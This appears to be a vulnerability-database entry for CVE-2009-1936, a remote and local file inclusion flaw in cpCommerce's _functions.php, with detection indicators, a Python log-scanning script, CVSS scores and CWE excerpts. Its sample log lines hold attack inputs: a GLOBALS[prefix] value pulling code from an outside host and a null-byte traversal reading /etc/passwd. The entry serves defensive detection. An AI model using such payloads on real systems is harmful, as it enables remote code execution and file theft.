CVE-2009-1936
Published: 2009-06-05
Priority: P259 · Severity: critical · CVSS 3.1 base score: 9.8
Flags: EXPLOIT
EPSS: 42.22% (98.5th percentile)
_functions.php in cpCommerce 1.2.x, possibly including 1.2.9, sends a redirect but does not exit when it is called directly, which allows remote attackers to bypass a protection mechanism to conduct remote file inclusion and directory traversal attacks, execute arbitrary PHP code, or read arbitrary files via the GLOBALS[prefix] parameter, a different vector than CVE-2003-1500.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cpcommerce_project | cpcommerce | 1.2.0 – 1.2.9 | — |
Detection & IOCs (extracted from sources)
- Detect GET requests to /_functions.php with a GLOBALS[prefix] parameter: direct access to this file is the attack vector, and the file is never called directly by legitimate users.
- Flag requests where GLOBALS[prefix] contains a URL scheme (e.g. 'http://'), indicating a Remote File Inclusion attempt.
- Flag requests where GLOBALS[prefix] contains a null byte (%00), indicating a Local File Inclusion / directory traversal attempt using null-byte termination.
- The exploit checks response content for the strings 'Failed opening' and 'No database selected' to confirm success; monitor outbound responses for these strings as a data-leakage indicator.
- The exploit only works when PHP's register_globals is ON; with register_globals=off the GLOBALS[prefix] parameter cannot be injected, which neutralises the attack.
- Local File Inclusion (LFI) via null-byte termination additionally requires magic_quotes to be OFF; with magic_quotes=on the null byte is escaped and LFI is blocked.
- Remote File Inclusion is blocked when PHP's URL file access is disabled (allow_url_include/allow_url_fopen=off); the exploit checks for this condition before proceeding.
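The request-side indicators and PHP preconditions listed above can be turned into a small triage script. The following is an added example, not code from this advisory, from cpCommerce, or from the referenced exploit: it classifies access-log lines in the Apache/nginx "combined" format against the /_functions.php indicators, checks response bodies for the two leakage strings, and rates a php.ini-style configuration against the three preconditions. The log lines and ini values are constructed for illustration; the file name, parameter name and ini directive names come from the text above.

```python
"""
Added example (not from the advisory or cpCommerce): classify web-server access-log
lines against the request-side indicators listed above, check response bodies for
the leakage strings, and rate a PHP configuration against the exploit's
preconditions. All sample data below is constructed for illustration.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

TARGET_FILE = "/_functions.php"   # script that is never requested directly by legitimate users
PARAM = "GLOBALS[prefix]"         # injected parameter named in the advisory
URL_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
LEAK_MARKERS = ("Failed opening", "No database selected")


def classify(line):
    """Return the indicator tags that one access-log line triggers (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith(TARGET_FILE):
        return []
    tags = ["direct-access:_functions.php"]
    # parse_qsl percent-decodes keys and values, so an encoded %00 becomes a real
    # NUL byte and an encoded GLOBALS%5Bprefix%5D becomes GLOBALS[prefix].
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key != PARAM:
            continue
        if URL_SCHEME_RE.match(value):
            tags.append("rfi:url-scheme")
        if "\x00" in value:
            tags.append("lfi:null-byte")
        if "../" in value or "..\\" in value:
            tags.append("traversal:dot-dot")
    return tags


def scan(lines):
    """Return (line_index, tags) for every line that triggered at least one indicator."""
    hits = []
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            hits.append((i, tags))
    return hits


def response_leak_markers(body):
    """Leakage strings the exploit looks for in responses; their presence in
    outbound content is the data-leakage indicator noted above."""
    return [marker for marker in LEAK_MARKERS if marker in body]


def exposure(ini):
    """Rate a php.ini-style dict (directive -> value string) against the three
    preconditions: register_globals, magic_quotes_gpc and URL file access.
    Assumption: allow_url_include OR allow_url_fopen counts as URL access enabled,
    matching how the advisory lumps the two; on PHP 5.2+ allow_url_include governs."""
    def on(key):
        return ini.get(key, "").strip().lower() in ("1", "on", "true", "yes")
    injectable = on("register_globals")
    return {
        "injectable": injectable,
        "rfi": injectable and (on("allow_url_include") or on("allow_url_fopen")),
        "lfi_nullbyte": injectable and not on("magic_quotes_gpc"),
    }


# Constructed sample log lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jun/2009:10:01:12 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123',
    '203.0.113.7 - - [05/Jun/2009:10:02:30 +0000] "GET /_functions.php?GLOBALS[prefix]=http://198.51.100.9/x.txt? HTTP/1.1" 200 812',
    '203.0.113.7 - - [05/Jun/2009:10:02:31 +0000] "GET /_functions.php?GLOBALS[prefix]=../../../../etc/passwd%00 HTTP/1.1" 200 1540',
    '203.0.113.9 - - [05/Jun/2009:10:03:02 +0000] "GET /_functions.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for index, tags in scan(SAMPLE_LOG):
        print(index, tags)
    print(exposure({"register_globals": "On", "allow_url_include": "On", "magic_quotes_gpc": "Off"}))
```

Feed real log lines into `scan` and treat any hit as worth a look: even a bare direct request to /_functions.php with no parameter is anomalous for this application, while the `rfi:` and `lfi:` tags identify which of the two attack paths was attempted. `exposure` is the quick way to tell, from a copy of php.ini, whether a given host could be affected at all before chasing log hits.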
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
No detection rules found.
No writeups or analysis indexed.
CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
Source: mitre_cwe
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.
In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the product will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
Modes of Introduction: Phase: Implementation. Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
CWE-698: Execution After Redirect (EAR)
Source: mitre_cwe · CVSS 10.0 [CRITICAL]
The web application sends a redirect to another location, but instead of exiting, it executes additional code.
Modes of Introduction: Phase: Implementation.
Common Consequences: Scope: Other, Confidentiality, Integrity, Availability. Impact: Alter Execution Logic, Execute Unauthorized Code or Commands. This weakness could affect the control flow of the application and allow execution of untrusted code.
Detection Methods: Black Box: This issue might not be detected if testing is performed using a web browser, because the browser might obey the redirect and move the user to a different page before the application has produced outputs that indicate something is amiss.
Examples:
This code queries a server and displays its status when a request comes
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Source: mitre_cwe
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is inte